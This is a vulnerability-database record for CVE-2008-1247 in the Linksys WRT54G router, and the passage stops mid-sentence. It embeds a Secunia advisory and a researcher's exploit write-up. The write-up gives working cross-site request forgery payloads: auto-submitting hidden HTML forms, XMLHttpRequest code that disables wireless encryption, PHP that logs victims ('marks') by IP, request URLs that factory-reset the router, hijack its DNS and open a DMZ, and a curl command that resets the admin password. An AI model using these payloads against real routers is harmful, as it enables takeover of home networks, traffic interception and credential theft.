VAR-200803-0170
Vulnerability from variot - Updated: 2023-12-18 11:26The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------
A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched.
Download and test it today: https://psi.secunia.com/
Read more about this new version: https://psi.secunia.com/?page=changelog
TITLE: Linksys WRT54G Security Bypass Vulnerability
SECUNIA ADVISORY ID: SA29344
VERIFY ADVISORY: http://secunia.com/advisories/29344/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: meathive has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to improper authorization checks when performing administrative actions via the web interface. This can be exploited to perform restricted actions by directly accessing Basic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri, dmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri, vpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri, ping.tri, tracert.tri, or rstatus.tri.
WRT54G v5/v6: Install version 1.02.5.
WRT54G v8: Install version 8.00.5.
WRT54G v8.2: Install version 8.2.05.
PROVIDED AND/OR DISCOVERED BY: meathive
ORIGINAL ADVISORY: http://kinqpinz.info/lib/wrt54g/own.txt
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. __ _ _ ___ ____ ____ ____ _____ ____ ____ _____ ___ | l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \ | ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y | \ | | | | || Q || / | | | | || __j | | | | || l_ | O | | Y | | | | || || | | | | | || / | __ | | | | || _] | | | .
++| Intro
This text is in addition to the findings I have already made public regarding the Linksys WRT54G wireless router and firewall gateway device. The scripts that process configuration changes do not require authentication and therefore can be altered remotely via simple form submissions written in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with sample exploits.
++| Let's Get Dirty
You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows how forms can be constructed in HTML that take advantage of the major flaws present within the insecure router. In my previous documentation I showed how it is possible to alter configuration parameters both via Linux command line using curl and HTML form submissions. In this text I demonstrate how to do these very same things transparently using a combination of HTML form construction with JavaScript that automagically submits our desired changes.
The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all that is required in order to submit our form that will be constructed using GET parameters observed from the device's Web interface.
document.f.submit();
This submits forms hidden within the Webpage. Our first example code enables wireless access with an SSID of our choosing. In this instance, I will use the SSID "kinqpinz".
The reason this works is simple: configuration parameters are constructed in the URL in the Web interface, hosted by default at the address http://192.168.1.1. One can view these parameters while configuring their device. The code above simply constructs a URL that is processed by the router's IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:
http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
It's simple enough to understand what's going on. Each variable passed in the URL describes exactly what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part to exploiting the router is the fact that you cannot alter settings using a URL like the one above. That would result in a GET request on behalf of the device, whereas we're interested in POST requests that actually trigger configuration changes. A GET request does nothing. Below I describe a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, and a touch of PHP to grab the mark's external IP.
++| Remote Real World Attack Scenario
So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It has made a few assumptions about your environment, however. One major assumption is that you've kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes you've made to the router in terms of security, e.g., strong password, wireless encryption, access restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so that you do not fall victim to a malicious individual hosting code that will be presented in this text.
++| Remote Real World Attack Scenario Requirements
On http://www.hacker.tld a page is hosted that contains the following: (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; (2) JavaScript that submits these forms transparently; (3) PHP or similar server-side code that acquires the mark's external IP address as they browse the page; and, (4) PHP or similar server-side code that retains the mark's external IP address in the event that the remote form submission is successful, thus allowing the remote attacker to further exploit the device.
http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP is used - though any server-side language is suitable - for obtaining the external IP of any individual viewing the exploit page and writes this information to a log file.
The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute and submitting the form.
document.f.submit();All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the HTML form's 'hidden' attribute.
What you should observe from this is the form name of "f" which is used in the JS to submit the form as well as the various 'name' and 'value' attributes that are used to create a URL such as this:
submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
Do note that without any one of these parameters, the exploit fails and nothing changes. All of the elements must remain in place even if they do not directly make sense. They are simply options that the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case matters and do not forget that the request must be POST, not GET. Also different config changes require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log.
Now that the malicious page has been composed and sits online living and waiting for marks at http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom PHP logging script. In mark.txt, our logging file, sample output would resemble something like the following.
Potential mark resides at 1.1.1.1
Potential mark resides at 2.2.2.2
Potential mark resides at 3.3.3.3
So forth...
They are potential marks because it is unknown whether or not they are using the WRT54G with a supported firmware version that is exploitable using these techniques, and/or the exploit attempt failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not using the default local address (good for them) that this attack relies on.
When they browse the page, because we have set no timeout for this change to occur, they are instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, does not inform the user if they were educated enough of what has just happened, so they may continue on doing whatever they were doing, more often than not unaware of what has just happened. At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at our leisure and further test the remote host whether or not they are vulnerable to attack. At the very least, we may decide to completely reset the router to rest assured we know its current state to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. This is quite feasible, here's how.
This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en
Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs all incoming and outgoing requests before passing them on to the next in line.
This is indeed convoluted but all of these values must be in place in order to be successful. What is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the following URL that is submitted to http://192.168.1.1/Basic.tri.
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
++| An Alternative (with JavaScript)
This is the basic exploitation method of the router although the attacker has many alternatives of submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. A few alternative methods would include using a JavaScript onClick function within a standard looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:
...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this standard looking navigation link, e.g.:
var xhr=false; if(window.XMLHttpRequest) { xhr=new XMLHttpRequest(); } else if(window.ActiveXObject) { xhr=new ActiveXObject("Microsoft.XMLHTTP"); } function xhrRequest() { if(xhr) { xhr.open("POST", "http://192.168.1.1/Security.tri", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange=function() { if(xhr.readyState == 4 && xhr.status == 200) { var success=xhr.responseText; } } xhr.send("SecurityMode=0&layout=en"); } }
The example above effectively disables all wireless encryption so that if you happen to live close enough to this poor individual, it is your duty to pwn their wireless by enabling open access for everybody in the neighborhood! Here's the URL for disabling wireless encryption:
http://192.168.1.1/Security.tri?SecurityMode=0&layout=en
++| An Alternative (without JavaScript)
You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent looking methods of compromising your WRT54G. For example, user registration for a bulletin board or forum system. The site must acquire a minimal amount of information in order to create the account so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the URL once again:
http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en
Again it is a different script processing the request on behalf of the router's internal operating system, dmz.tri, but it still does not require authentication prior to changing the settings we wish to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:
...and add these values to their user registration page with standard username/password/e-mail fields... Username:Password:
Confirm Password:
...that can be found on traditional forums these days. The mark submits and exploits his/her own router although they believe they are at least minimally technically savvy by using a combination of technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms we use to store the router configs are hidden, and the normal user registration forms are not, thus it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has detected that a potential attack is taking place it is likely too late as the mastermind behind http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration changes within 10 seconds, which is plenty of time for them to open another terminal and change the administrative login to block our mark from changing their settings, e.g.:
curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri
Here the hacker can now log in as admin with password 'pwn' with complete freedom to REMOTELY monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more.
++| Conclusion
It is my intention in finalizing this document that the reader understands that the Linksys WRT54G firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care whether or not you have the level of privilege thought to be necessary for manipulating sensitive objects.
Thanks go to hw2B for suggesting I write all of this garbage out.
++| URLs
https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document) https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008) https://kinqpinz.info/lib/wrt54g/own2.txt (this document) http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0170",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "1.00.9"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.01.0.9"
}
],
"sources": [
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:1.00.9:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1247"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "meathive",
"sources": [
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.8
},
"cve": "CVE-2008-1247",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2008-1247",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-31372",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1247",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-125",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-31372",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. \nSuccessful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. \nThe issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------\n\nA new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI\nhas been released. The new version includes many new and advanced\nfeatures, which makes it even easier to stay patched. \n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Security Bypass Vulnerability\n\nSECUNIA ADVISORY ID:\nSA29344\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/29344/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nmeathive has reported a vulnerability in Linksys WRT54G, which can be\nexploited by malicious people to bypass certain security\nrestrictions. \n\nThe vulnerability is caused due to improper authorization checks when\nperforming administrative actions via the web interface. This can be\nexploited to perform restricted actions by directly accessing \nBasic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri,\ndmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri,\nvpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri,\nping.tri, tracert.tri, or rstatus.tri. \n\nWRT54G v5/v6:\nInstall version 1.02.5. \n\nWRT54G v8:\nInstall version 8.00.5. \n\nWRT54G v8.2:\nInstall version 8.2.05. \n\nPROVIDED AND/OR DISCOVERED BY:\nmeathive\n\nORIGINAL ADVISORY:\nhttp://kinqpinz.info/lib/wrt54g/own.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \t __ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___\n\t| l/ ]l j| \\ / \\ | \\l j| \\ | T l j| \\ | | / \\\n\t| \u0027 / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y\n\t| \\ | | | | || Q || _/ | | | | || __j | | | | || l_ | O |\n\t| Y | | | | || || | | | | | || / | __ | | | | || _] | |\n\t| . \n\n++| Intro\n----------------------\nThis text is in addition to the findings I have already made public regarding the Linksys WRT54G \nwireless router and firewall gateway device. The scripts that process configuration changes do not \nrequire authentication and therefore can be altered _remotely_ via simple form submissions written \nin HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous \nfindings and the demo page with sample exploits. \n\n++| Let\u0027s Get Dirty\n----------------------\nYou may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows\nhow forms can be constructed in HTML that take advantage of the major flaws present within the \ninsecure router. In my previous documentation I showed how it is possible to alter configuration \nparameters both via Linux command line using curl and HTML form submissions. In this text I \ndemonstrate how to do these very same things transparently using a combination of HTML form \nconstruction with JavaScript that automagically submits our desired changes. \n\nThe JavaScript is simple and is only used for submitting the form - a user-free mechanism that will \nredirect the user to their router and prompts them to log in. Once again, THE REQUEST TO \nAUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all \nthat is required in order to submit our form that will be constructed using GET parameters observed \nfrom the device\u0027s Web interface. \n\ndocument.f.submit();\n\nThis submits forms hidden within the Webpage. Our first example code enables wireless access with an\nSSID of our choosing. In this instance, I will use the SSID \"kinqpinz\". \n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nThe reason this works is simple: configuration parameters are constructed in the URL in the Web \ninterface, hosted by default at the address http://192.168.1.1. One can view these parameters while \nconfiguring their device. The code above simply constructs a URL that is processed by the router\u0027s \nIOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:\n\nhttp://192.168.1.1/WBasic.tri?submit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nIt\u0027s simple enough to understand what\u0027s going on. Each variable passed in the URL describes exactly \nwhat its purpose is - at least the important ones such as \"SSID\" and \"channel\". The only tricky part \nto exploiting the router is the fact that you cannot alter settings using a URL like the one above. \nThat would result in a GET request on behalf of the device, whereas we\u0027re interested in POST \nrequests that actually trigger configuration changes. A GET request does nothing. Below I describe \na real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, \nand a touch of PHP to grab the mark\u0027s external IP. \n\n++| Remote Real World Attack Scenario\n----------------------\nSo http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It \nhas made a few assumptions about your environment, however. One major assumption is that you\u0027ve \nkept your router\u0027s default local gateway address, namely 192.168.1.1. No matter what other changes \nyou\u0027ve made to the router in terms of security, e.g., strong password, wireless encryption, access \nrestrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do \nNOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so \nthat you do not fall victim to a malicious individual hosting code that will be presented in this \ntext. \n\n++| Remote Real World Attack Scenario Requirements\n----------------------\nOn http://www.hacker.tld a page is hosted that contains the following:\n (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely;\n (2) JavaScript that submits these forms transparently;\n (3) PHP or similar server-side code that acquires the mark\u0027s external IP address as they browse \n the page; and,\n (4) PHP or similar server-side code that retains the mark\u0027s external IP address in the event that \n the remote form submission is successful, thus allowing the remote attacker to further exploit the \n device. \n\nhttp://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP \nis used - though any server-side language is suitable - for obtaining the external IP of any \nindividual viewing the exploit page and writes this information to a log file. \n\u003c?php\n $ip=$_SERVER[\u0027REMOTE_ADDR\u0027];\n $toWrite=\"Potential mark resides at $ip\\n\\n\";\n $f=fopen(\"mark.txt\", \"a+\");\n fwrite($f, $toWrite);\n fclose($f);\n?\u003e\n\nThe JavaScript is as simple as retrieving the form object identified by the \u0027name\u0027 HTML attribute \nand submitting the form. \n\n\u003cscript type=\"text/javascript\"\u003e\n document.f.submit();\n\u003c/script\u003e\n\nAll hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the\nHTML form\u0027s \u0027hidden\u0027 attribute. \n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nWhat you should observe from this is the form name of \"f\" which is used in the JS to submit the form \nas well as the various \u0027name\u0027 and \u0027value\u0027 attributes that are used to create a URL such as this:\n\nsubmit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nDo note that without any one of these parameters, the exploit fails and nothing changes. All of the \nelements must remain in place even if they do not directly make sense. They are simply options that \nthe processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case \nmatters and do not forget that the request must be POST, not 